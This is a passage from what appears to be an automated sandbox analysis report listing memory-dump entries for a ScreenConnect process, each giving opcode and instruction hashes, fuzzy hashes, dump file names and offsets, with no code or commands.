                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85767660f25c340240a6fdd1572f79e4648388c670ff3ec9939c7f8f2ebb270c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E110671E003449FDB11CF68D840EEEBBB5AFC5720F04C4AAD940DB151D731A901CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0e3126f56390aafad41b2de9d1c07cc42cd805264e903cb05cc58b0b46b6488b
                                                                                                                                                                                                  • Instruction ID: 1e30c5aa4c7c4f20218af5679f30627f8871cbe8737e71567d911d1542c5fb8c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e3126f56390aafad41b2de9d1c07cc42cd805264e903cb05cc58b0b46b6488b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B71F534B102059FDB14DFA9D494EAEB7B6FF8D655B108198E906AB365DB30EC01CF40
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9fb6e5feb16efb1371477fc4ebf2c0274e35498f1234578ad1b78c380898cd9d
                                                                                                                                                                                                  • Instruction ID: 48deba6c95a13c0cf139405562fa3bbe4e10a2a210b97e40ce71238b4e2ca856
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9fb6e5feb16efb1371477fc4ebf2c0274e35498f1234578ad1b78c380898cd9d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4516930E003099FDB05DFB8E858BDDBBB2FF89300F148659E404AB294DB74A995CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f66dcfb31508b36c879253beb30088ca15057cad43f749a65e34ae906c7f3029
                                                                                                                                                                                                  • Instruction ID: 27dc3bd7af696d3a44bfcb9556ed81aae937755743a70c1112264bb8f5448243
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f66dcfb31508b36c879253beb30088ca15057cad43f749a65e34ae906c7f3029
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A513330B00215DFDB659B68D818BBEBBF2FF84B04F14852AE846DB295DB319C45CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9db7cece4865703811a76479fce54147e785c8c4e44c37e469d15188a5c6cf0c
                                                                                                                                                                                                  • Instruction ID: aa3581455130f88feb89c949b1792c55b36688a3b7d54ed305b621975dc87fac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db7cece4865703811a76479fce54147e785c8c4e44c37e469d15188a5c6cf0c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71514A34600B058FD768CF29D488A26B7F6FF8D724B144A1CE8968B7A4EB31E845CF44
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3833665bdb841f002dd0a8bdb4f43dc7ce9560d1391406fd5674306a5db529cd
                                                                                                                                                                                                  • Instruction ID: 27c7b90db47734d7a287dc59a8823e2cd0bb4a2748ff930bc3c1f53620aa84db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3833665bdb841f002dd0a8bdb4f43dc7ce9560d1391406fd5674306a5db529cd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F515C70E003099FDB05DFB5E848BDDBBB2FF89300F108569E415AB294EB74A995CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: cc05d6c12d500c319ac7bf8936772be7b4d5a964a1b81decd39333765e6fcdba
                                                                                                                                                                                                  • Instruction ID: f2febb1e975a180a3a15263347806378440137e3e7df88633328d5f551335ef1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc05d6c12d500c319ac7bf8936772be7b4d5a964a1b81decd39333765e6fcdba
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B141B331A00205CBDB19EF68E498A6EBB76EFC4714B04C159DD09AB245DB34EC46CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 211b1b9cfaf58523cc088af8880a19e35227447a2b9cfe0cfd5d01004a3629ab
                                                                                                                                                                                                  • Instruction ID: 2e3d2991228c4d17f243d43a9eff6da7f3200fd411d87d005f292126aef5620f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 211b1b9cfaf58523cc088af8880a19e35227447a2b9cfe0cfd5d01004a3629ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C416C74A00709CFCB64CF39D848A6ABBF5FF48755B108A28D856D77A1EB30E845CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f5ef9bf673b2d44a87d3a8825efde83b3e7484686cce8f2458b6da09310b3d17
                                                                                                                                                                                                  • Instruction ID: 2e3f8844e42c030fc38d2340a8a8bd64bdaa0d40af280da8aee996cf165b8340
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5ef9bf673b2d44a87d3a8825efde83b3e7484686cce8f2458b6da09310b3d17
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99418C74A00709CFDB74CF39D848AAABBF1FF48754B144A28D856D76A1EB30E845CB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7211e6de351de465a20ab1542f516de4c299a3dea9dec650052a1755457be973
                                                                                                                                                                                                  • Instruction ID: 1aa4a145d0cc572ef31654dd3d17d90ff9112f6443d01649842989f4c1db912b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7211e6de351de465a20ab1542f516de4c299a3dea9dec650052a1755457be973
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE316D32B002058FDB14AE69C498AAFF7F5EF8A798F108469D90AE7750DB30DC058B90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 05bae1cba6b099d126e2ea6608b681dcd2bc3af624a8b24b49f42f8c4dfac16f
                                                                                                                                                                                                  • Instruction ID: 81aef5bf8a128db75e6acf65bd40aab7faa2a02e53369c27a34101fc333d2abd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05bae1cba6b099d126e2ea6608b681dcd2bc3af624a8b24b49f42f8c4dfac16f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D31C370B041848FC70A9B68C850AAEFFB2EF8A340B1880A6D949DB395DA309D09C791
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a725af7b2f5fefd0a2b73744b7a05068bf9792000a8539dec97f71ecd7e5c477
                                                                                                                                                                                                  • Instruction ID: c4582ab0ca0e3a297ebdccb2cefbd8e2341ae1a7bb1f3191bd996979c116affb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a725af7b2f5fefd0a2b73744b7a05068bf9792000a8539dec97f71ecd7e5c477
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22313A30600705CFC770DF29D888A6AB7F6EF89625B144A1CD956CB7A1E730F905CB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6297e53410b1bbea78b7b6d6c40f0aa1459d50b9f3e4b47e36771c14fb817cc7
                                                                                                                                                                                                  • Instruction ID: b0e53269f15ddc7d05d8783790702c079bec590c760ad05ad34e04a28f8af3e4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6297e53410b1bbea78b7b6d6c40f0aa1459d50b9f3e4b47e36771c14fb817cc7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C313E32A0021ADFCB04DFA8E4449DEFBB2FF89718F158569D9057B260DB31691ACB94
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d8d64cbbb89c0e656d9b9ce791ce368ca759cb9a94f64c30d804698ea9aa6246
                                                                                                                                                                                                  • Instruction ID: ba4343512abb0232f3cfe7eb8b4ad9bd1a24550497f9b266a878847bf724fb7f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8d64cbbb89c0e656d9b9ce791ce368ca759cb9a94f64c30d804698ea9aa6246
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4521D235B003069BD704EB38D840ABEBBB2EBC9210F148529D419AB384DF30AD0987E1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e994e18308b99c9d27c6c4ea2ebbc4a9a9b00edd7b28bed978434e2fa386348c
                                                                                                                                                                                                  • Instruction ID: f3fe5e4a20ffdaecb22e6bad3297875211302ae1c9340643fab968b91417dc87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e994e18308b99c9d27c6c4ea2ebbc4a9a9b00edd7b28bed978434e2fa386348c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 102133305007059FDB38CF2AD848A56B7F5EF84714B008B1DD597976A1EB31E985CF80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 905b0bbd78178889c906c5e4547ce6a1e62f04ef16bde65cf9f65206dc45c5e3
                                                                                                                                                                                                  • Instruction ID: e7029da3269284c535f2400725af999c03e0487290cdf6daeaf49349cbafebf8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 905b0bbd78178889c906c5e4547ce6a1e62f04ef16bde65cf9f65206dc45c5e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51119135B003059BDB04EB68D940B7EB7B6FBC9610F548528D509AB3C4EF70AD0987E6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7f694a1a7a66da88eb45b1583371c26290b705dabae1dffc62def21cb45a4e80
                                                                                                                                                                                                  • Instruction ID: 8839ed1cfdb98786afb05a03c90cc4ed75ba9b40f01fd6144c2d545053561c5c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f694a1a7a66da88eb45b1583371c26290b705dabae1dffc62def21cb45a4e80
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A11513690120ADFCF01DFA8D9819DEBBF1FF4A704B108599D544BF261D771AA0ACB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 768ae3b8fb549abcd2fe3fa9c0c5f544f997dbe84927acf6f87c8be6563c6a3d
                                                                                                                                                                                                  • Instruction ID: 7327665ba5c7b551979d1fd13ba0ba813d460800ff651fe86e0edd1979b91884
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 768ae3b8fb549abcd2fe3fa9c0c5f544f997dbe84927acf6f87c8be6563c6a3d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF014171B043555FCB068B69D8004ABBBF9EFC8A14318896AD809CB302DBB1DC0687C0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 08c0e2bc5cca8d8b53658c5f64fd4081d66a9a276d0c2d21e8452e56c4039c38
                                                                                                                                                                                                  • Instruction ID: aa45f86c4e38fc80ee5ca326b02179700f71b6febeb8be4f255474fe25cac4d2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08c0e2bc5cca8d8b53658c5f64fd4081d66a9a276d0c2d21e8452e56c4039c38
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C11553190024EDFDB00DFA8E484AEDFBB2BF85618B58C444E805AB155DB31B94ACBA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9a658ec6874c819328ef783a2b96fb10753946fb88f4b2a89bffa182619e9478
                                                                                                                                                                                                  • Instruction ID: e95522538f96c2b543e49acb1353c4264e26fd76a3cf9db59bc4da179e62a9b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a658ec6874c819328ef783a2b96fb10753946fb88f4b2a89bffa182619e9478
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7911123690020A9FCF00DFA4D9409DEBBF5FF49714B108569D509BB250E771AA0ACB95
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1763320196.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_126d000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 540fddf26505366f96dbed485726af1f1729609cb22208cf61e4bf4ec7d67db5
                                                                                                                                                                                                  • Instruction ID: eaee6141582faa1cb26f88b0f177e844673f540e478872aea009a336cb52a120
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 540fddf26505366f96dbed485726af1f1729609cb22208cf61e4bf4ec7d67db5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E001A73161434C9FFB204A95C984B66BF9CDF413A4F18C45AEE894A1C2C6799585CAB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 0684b1b75363105eba656464d853dcf9fa9cde0a1969a092e79fdf695b502208
                                                                                                                                                                                                  • Instruction ID: f340b98ba836e79da205f7202df8ab187c4b68760e2d1a6e5364fd6826145cd2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0684b1b75363105eba656464d853dcf9fa9cde0a1969a092e79fdf695b502208
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C601A230608384CFD33A9BB5E51CA267FB1EF4A52531680EADC498B267DB35DC42CB42
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: df5c778e720b60405842706e12bae1dea449a154a68e0b64b5efb26607f923a5
                                                                                                                                                                                                  • Instruction ID: e9fddb849024afba16ec94af2b59748b9050f45347c88c6c03ec6f159d2d8fb6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: df5c778e720b60405842706e12bae1dea449a154a68e0b64b5efb26607f923a5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 58F05836B082046BE728CAAEA400A9BBBEACBC4620B14C07FE54DC3680E931A5018764
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 590325c586b7a065389e469f8bef23b4a5b3402f001893adba3d33fc0c949a69
                                                                                                                                                                                                  • Instruction ID: 3eb9cf0ae4a6b332f68d69c8871bc775119d4037c572f178d3ee1b80923229e6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 590325c586b7a065389e469f8bef23b4a5b3402f001893adba3d33fc0c949a69
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85F024313007458FC752977CE4159EF3FE2DFC6650305816ED855CB610DA34AC4B8B80
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1763320196.000000000126D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0126D000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_126d000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 26bb08f3ff25de5695086ee0514c2c88b7cd5f1b11bb46bf864c775875a9d9b7
                                                                                                                                                                                                  • Instruction ID: e97f570e1f57e61fe83f2af1100e6e0ea4c2813ac017251af209cb600d1e7b3a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26bb08f3ff25de5695086ee0514c2c88b7cd5f1b11bb46bf864c775875a9d9b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF06271504348AFEB218A5AC9C4B66FF9CEB41764F18C55AEE884A2C7C2799844CAB1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 16eee2c2a0d74efeb5ceea516722d8cc8ac41740251e138c3a7e31969f8895c8
                                                                                                                                                                                                  • Instruction ID: c9c3935f83882112b345371fe2e122fac64cd3e2e182374b2dd0c16b4911d33a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16eee2c2a0d74efeb5ceea516722d8cc8ac41740251e138c3a7e31969f8895c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF0A736A0D3906FE755C7B9981259B7FE9CE85610704C0BFD09DC7141D52055038B34
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5942e2b7ca0905623a9ab5969fb39a037a52f11423c526f177bd169ad0440727
                                                                                                                                                                                                  • Instruction ID: 3dc2b1dd88280cfe41d87a94909520fbb05d2a8fb6fa534cad10da60f5d8e18b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5942e2b7ca0905623a9ab5969fb39a037a52f11423c526f177bd169ad0440727
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94F0247250C3D18FD312D778E8216A87FA0EE872143494ACFD0C5CF563D665E90B8352
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a7659a98c2e8a8e979adfe624dbe00c05292ca41abbd87aedfb4a6514b10aebe
                                                                                                                                                                                                  • Instruction ID: aaf38b7f51b3c5bfd9a4dd00f84179c8637780e6ef21e7125c03d0f427389155
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7659a98c2e8a8e979adfe624dbe00c05292ca41abbd87aedfb4a6514b10aebe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9F0A332705181CFC751826CD8C18E47FF54F8956873C86B1FC64CB381E610EC468351
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 41c148b0f8271f90b549b1114fdbe7071330b025d2854a05bd2daa47c00a1a77
                                                                                                                                                                                                  • Instruction ID: 9b80c3f7a7c63ed23cbfd87b52c80733109b22ba12aa2e02695a1fd5b382ce49
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41c148b0f8271f90b549b1114fdbe7071330b025d2854a05bd2daa47c00a1a77
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30F0A9356002504FC358AB38A41C4AE3FBAAFCA22131A816EE44AC33A5CE304C56CB61
                                                                                                                                                                                                  Memory Dump Source
